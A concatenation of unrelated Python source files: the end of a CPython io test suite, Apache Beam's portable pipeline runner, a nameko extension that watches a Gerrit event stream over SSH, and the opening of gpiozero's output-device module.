cookie = f.tell()
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.read(2), u"ab")
self.assertEquals(f.read(1), u"c")
self.assertEquals(f.read(1), u"")
self.assertEquals(f.read(), u"")
self.assertEquals(f.tell(), cookie)
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.seek(0, 2), cookie)
self.assertEquals(f.write(u"def"), 3)
self.assertEquals(f.seek(cookie), cookie)
self.assertEquals(f.read(), u"def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = u"s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = u"".join(chars) + u"\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEquals(rlines, wlines)
def testTelling(self):
f = io.open(test_support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write(u"\xff\n")
p1 = f.tell()
f.write(u"\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEquals(f.tell(), p0)
self.assertEquals(f.readline(), u"\xff\n")
self.assertEquals(f.tell(), p1)
self.assertEquals(f.readline(), u"\xff\n")
self.assertEquals(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEquals(line, u"\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEquals(f.tell(), p2)
f.close()
def testSeeking(self):
chunk_size = io.TextIOWrapper._CHUNK_SIZE
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEquals(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = io.open(test_support.TESTFN, "wb")
f.write(line*2)
f.close()
f = io.open(test_support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEquals(s, unicode(prefix, "ascii"))
self.assertEquals(f.tell(), prefix_size)
self.assertEquals(f.readline(), u_suffix)
def testSeekingToo(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = io.open(test_support.TESTFN, "wb")
f.write(data)
f.close()
f = io.open(test_support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def testSeekAndTell(self):
"""Test seek/tell using the StatefulIncrementalDecoder."""
def testSeekAndTellWithData(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = io.open(test_support.TESTFN, 'wb')
f.write(data)
f.close()
f = io.open(test_support.TESTFN, encoding='test_decoder')
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = io.open(test_support.TESTFN, encoding='test_decoder')
self.assertEquals(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEquals(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEquals(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
testSeekAndTellWithData(input)
# Position each test case so that it crosses a chunk boundary.
CHUNK_SIZE = io.TextIOWrapper._CHUNK_SIZE
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
testSeekAndTellWithData(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def testEncodedWrites(self):
data = u"1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = io.BytesIO()
f = io.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEquals(f.read(), data * 2)
self.assertEquals(buf.getvalue(), (data * 2).encode(encoding))
def timingTest(self):
timer = time.time
enc = "utf8"
line = "\0\x0f\xff\u0fff\uffff\U000fffff\U0010ffff"*3 + "\n"
nlines = 10000
nchars = len(line)
nbytes = len(line.encode(enc))
for chunk_size in (32, 64, 128, 256):
f = io.open(test_support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunk_size
t0 = timer()
for i in range(nlines):
f.write(line)
f.flush()
t1 = timer()
f.seek(0)
for line in f:
pass
t2 = timer()
f.seek(0)
while f.readline():
pass
t3 = timer()
f.seek(0)
while f.readline():
f.tell()
t4 = timer()
f.close()
if test_support.verbose:
print("\nTiming test: %d lines of %d characters (%d bytes)" %
(nlines, nchars, nbytes))
print("File chunk size: %6s" % f._CHUNK_SIZE)
print("Writing: %6.3f seconds" % (t1-t0))
print("Reading using iteration: %6.3f seconds" % (t2-t1))
print("Reading using readline(): %6.3f seconds" % (t3-t2))
print("Using readline()+tell(): %6.3f seconds" % (t4-t3))
def testReadOneByOne(self):
txt = io.TextIOWrapper(io.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, "AA\nBB")
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def testReadByChunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = io.TextIOWrapper(io.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEquals(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_2(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_3(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEquals(reads, self.normalized)
def test_issue1395_4(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEquals(reads, self.normalized)
def test_issue1395_5(self):
txt = io.TextIOWrapper(io.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEquals(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = io.BytesIO(self.testdata)
txt = io.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def check_newline_decoder_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEquals(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEquals(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoder(self, decoder, encoding):
result = []
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
for b in encoder.encode(s):
result.append(decoder.decode(b))
self.assertEquals(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEquals(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEquals(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
self.assertEquals(decoder.decode("abc".encode(encoding)), "abc")
self.assertEquals(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = codecs.getincrementaldecoder(enc)()
decoder = io.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoder(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = io.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoder_utf8(decoder)
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
test_support.unlink(test_support.TESTFN)
def testImport__all__(self):
for name in io.__all__:
obj = getattr(io, name, None)
self.assert_(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower():
self.assert_(issubclass(obj, Exception), name)
else:
self.assert_(issubclass(obj, io.IOBase))
def test_attributes(self):
f = io.open(test_support.TESTFN, "wb", buffering=0)
self.assertEquals(f.mode, "wb")
f.close()
f = io.open(test_support.TESTFN, "U")
self.assertEquals(f.name, test_support.TESTFN)
self.assertEquals(f.buffer.name, test_support.TESTFN)
self.assertEquals(f.buffer.raw.name, test_support.TESTFN)
self.assertEquals(f.mode, "U")
self.assertEquals(f.buffer.mode, "rb")
self.assertEquals(f.buffer.raw.mode, "rb")
f.close()
f = io.open(test_support.TESTFN, "w+")
self.assertEquals(f.mode, "w+")
self.assertEquals(f.buffer.mode, "rb+") # Does it really matter?
self.assertEquals(f.buffer.raw.mode, "rb+")
g = io.open(f.fileno(), "wb", closefd=False)
self.assertEquals(g.mode, "wb")
self.assertEquals(g.raw.mode, "wb")
self.assertEquals(g.name, f.fileno())
self.assertEquals(g.raw.name, f.fileno())
f.close()
g.close()
def test_main():
test_support.run_unittest(IOTest, BytesIOTest, StringIOTest,
BufferedReaderTest, BufferedWriterTest,
BufferedRWPairTest, BufferedRandomTest,
StatefulIncrementalDecoderTest,
TextIOWrapperTest, MiscIOTest)
if __name__ == "__main__":
unittest.main()
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import json
import logging
import os
import threading
import time
from concurrent import futures
import grpc
from apache_beam import metrics
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import local_job_service
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.portability.job_server import DockerizedJobServer
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker import sdk_worker_main
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
@staticmethod
def default_docker_image():
if 'USER' in os.environ:
# Perhaps also test if this was built?
logging.info('Using latest locally built Python SDK docker image.')
return os.environ['USER'] + '-docker-apache.bintray.io/beam/python:latest'
else:
logging.warning('Could not find a Python SDK docker image.')
return 'unknown'
@staticmethod
def _create_environment(options):
portable_options = options.view_as(PortableOptions)
environment_urn = common_urns.environments.DOCKER.urn
if portable_options.environment_type == 'DOCKER':
environment_urn = common_urns.environments.DOCKER.urn
elif portable_options.environment_type == 'PROCESS':
environment_urn = common_urns.environments.PROCESS.urn
elif portable_options.environment_type in ('EXTERNAL', 'LOOPBACK'):
environment_urn = common_urns.environments.EXTERNAL.urn
elif portable_options.environment_type:
if portable_options.environment_type.startswith('beam:env:'):
environment_urn = portable_options.environment_type
else:
raise ValueError(
'Unknown environment type: %s' % portable_options.environment_type)
if environment_urn == common_urns.environments.DOCKER.urn:
docker_image = (
portable_options.environment_config
or PortableRunner.default_docker_image())
return beam_runner_api_pb2.Environment(
url=docker_image,
urn=common_urns.environments.DOCKER.urn,
payload=beam_runner_api_pb2.DockerPayload(
container_image=docker_image
).SerializeToString())
elif environment_urn == common_urns.environments.PROCESS.urn:
config = json.loads(portable_options.environment_config)
return beam_runner_api_pb2.Environment(
urn=common_urns.environments.PROCESS.urn,
payload=beam_runner_api_pb2.ProcessPayload(
os=(config.get('os') or ''),
arch=(config.get('arch') or ''),
command=config.get('command'),
env=(config.get('env') or '')
).SerializeToString())
elif environment_urn == common_urns.environments.EXTERNAL.urn:
return beam_runner_api_pb2.Environment(
urn=common_urns.environments.EXTERNAL.urn,
payload=beam_runner_api_pb2.ExternalPayload(
endpoint=endpoints_pb2.ApiServiceDescriptor(
url=portable_options.environment_config)
).SerializeToString())
else:
return beam_runner_api_pb2.Environment(
urn=environment_urn,
payload=(portable_options.environment_config.encode('ascii')
if portable_options.environment_config else None))
def run_pipeline(self, pipeline, options):
portable_options = options.view_as(PortableOptions)
job_endpoint = portable_options.job_endpoint
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
if not job_endpoint:
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
docker = DockerizedJobServer()
job_endpoint = docker.start()
job_service = None
elif job_endpoint == 'embed':
job_service = local_job_service.LocalJobServicer()
else:
job_service = None
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
portable_options.environment_config, server = (
BeamFnExternalWorkerPoolServicer.start(
sdk_worker_main._get_worker_count(options)))
globals()['x'] = server
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# This optimization is idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'combine').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn])
if pre_optimize == 'combine':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.lift_combiners],
known_runner_urns=flink_known_urns,
partial=True)
elif pre_optimize == 'all':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.extract_impulse_stages,
fn_api_runner_transforms.remove_data_plane_ops,
fn_api_runner_transforms.sort_stages],
known_runner_urns=flink_known_urns)
elif pre_optimize == 'none':
pass
else:
raise ValueError('Unknown value for pre_optimize: %s' % pre_optimize)
if not job_service:
channel = grpc.insecure_channel(job_endpoint)
grpc.channel_ready_future(channel).result()
job_service = beam_job_api_pb2_grpc.JobServiceStub(channel)
else:
channel = None
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
if channel:
grpc.channel_ready_future(channel).result()
return job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest())
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action' : 'store', 'help' : option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true'\
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
logging.debug("Runner option '%s' was already added" % option.name)
all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k, v in all_options.items()
if v is not None}
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(p_options)))
if prepare_response.artifact_staging_endpoint.url:
stager = portable_stager.PortableStager(
grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
options,
staging_location='')
else:
retrieval_token = None
try:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=prepare_response.preparation_id))
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain(
[next(state_stream)],
state_stream)
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=prepare_response.preparation_id))
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result.
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
if state_stream is None:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=run_response.job_id))
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=run_response.job_id))
return PipelineResult(job_service, run_response.job_id, message_stream,
state_stream, cleanup_callbacks)
class PortableMetrics(metrics.metric.MetricResults):
def __init__(self):
pass
def query(self, filter=None):
return {'counters': [],
'distributions': [],
'gauges': []}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id, message_stream, state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
def cancel(self):
try:
self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
return PortableMetrics()
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [m.message_response for m in self._messages
if m.HasField('message_response')]
error_messages = [m for m in messages
if m.importance ==
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
logging.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(
message.state_response.state))
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' % (
self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
class BeamFnExternalWorkerPoolServicer(
beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolServicer):
def __init__(self, worker_threads):
self._worker_threads = worker_threads
@classmethod
def start(cls, worker_threads=1):
worker_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
worker_address = 'localhost:%s' % worker_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnExternalWorkerPoolServicer_to_server(
cls(worker_threads), worker_server)
worker_server.start()
return worker_address, worker_server
def NotifyRunnerAvailable(self, start_worker_request, context):
try:
worker = sdk_worker.SdkHarness(
start_worker_request.control_endpoint.url,
worker_count=self._worker_threads,
worker_id=start_worker_request.worker_id)
worker_thread = threading.Thread(
name='run_worker_%s' % start_worker_request.worker_id,
target=worker.run)
worker_thread.daemon = True
worker_thread.start()
return beam_fn_api_pb2.NotifyRunnerAvailableResponse()
except Exception as exn:
return beam_fn_api_pb2.NotifyRunnerAvailableResponse(
error=str(exn))
|
extra_extension.py
|
import json
import pprint
import select
import paramiko
import threading
import traceback
from nameko.extensions import ProviderCollector, SharedExtension
from logging import getLogger
LOGGER = getLogger(__name__)
class GerritWatcherServer(ProviderCollector, SharedExtension):
"""
A SharedExtension that wraps a gerrit client interface
for processing gerrit event
"""
def __init__(self, username=None, hostname=None,
port=None, keyfile=None):
super(GerritWatcherServer, self).__init__()
self.username = username
self.hostname = hostname
self.port = port
self.keyfile = keyfile
self._starting = False
self._stop = threading.Event()
self.client = None
def _dispatch(self, fd):
line = fd.readline()
if not line:
return
data = json.loads(line)
LOGGER.debug("Received data from Gerrit event stream: %s",
pprint.pformat(data))
providers = self.filter_provider(data)
for provider in providers:
provider.handle_message(data)
def filter_provider(self, msg):
providers = []
for provider in self._providers:
if provider.is_match(msg):
providers.append(provider)
return providers
def _listen(self, stdout, _stderr):
poll = select.poll()
poll.register(stdout.channel)
while not self._stop.isSet():
ret = poll.poll()
for (fd, event) in ret:
if fd != stdout.channel.fileno():
continue
if event == select.POLLIN:
self._dispatch(stdout)
else:
raise Exception("event on ssh connection")
def _connect(self):
"""
Attempts to connect and returns the connected client.
"""
def _make_client():
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
return client
client = None
try:
client = _make_client()
client.connect(self.hostname,
username=self.username,
port=self.port,
key_filename=self.keyfile)
return client
except (IOError, paramiko.SSHException) as e:
LOGGER.error("Exception connecting to %s:%s",
self.hostname, self.port)
if client:
try:
client.close()
except (IOError, paramiko.SSHException):
LOGGER.error("Failure closing broken client")
else:
raise e
def _consume(self):
"""
Consumes events using gerrit client.
"""
_, stdout, stderr = self.client.exec_command("gerrit stream-events")
self._listen(stdout, stderr)
ret = stdout.channel.recv_exit_status()
LOGGER.info("SSH exit status: %s", ret)
def _run(self):
while not self._stop.isSet():
self.client = self._connect()
try:
self._consume()
# pylint: disable=broad-except
except Exception as e:
LOGGER.error('Hit exception: %s Back Trace: %s',
e, traceback.format_exc())
finally:
LOGGER.info("Stop client")
if self.client:
try:
self.client.close()
except (IOError, paramiko.SSHException):
LOGGER.error("Failure closing broken client")
def start(self):
if self._starting:
return
self._starting = True
th = threading.Thread(target=self._run, args=())
th.start()
def stop(self):
self._stop.set()
self.client.close()
super(GerritWatcherServer, self).stop()
|
output_devices.py
|
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2016-2019 Andrew Scheller <[email protected]>
# Copyright (c) 2015-2019 Dave Jones <[email protected]>
# Copyright (c) 2015-2019 Ben Nuttall <[email protected]>
# Copyright (c) 2019 tuftii <[email protected]>
# Copyright (c) 2019 tuftii <pi@raspberrypi>
# Copyright (c) 2016 Ian Harcombe <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
str = type('')
from threading import Lock
from itertools import repeat, cycle, chain
from colorzero import Color
from collections import OrderedDict
try:
from math import log2
except ImportError:
from .compat import log2
from .exc import OutputDeviceBadValue, GPIOPinMissing
from .devices import GPIODevice, Device, CompositeDevice
from .mixins import SourceMixin
from .threads import GPIOThread
from .tones import Tone
class OutputDevice(SourceMixin, GPIODevice):
"""
Represents a generic GPIO output device.
This class extends :class:`GPIODevice` to add facilities common to GPIO
output devices: an :meth:`on` method to switch the device on, a
corresponding :meth:`off` method, and a :meth:`toggle` method.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
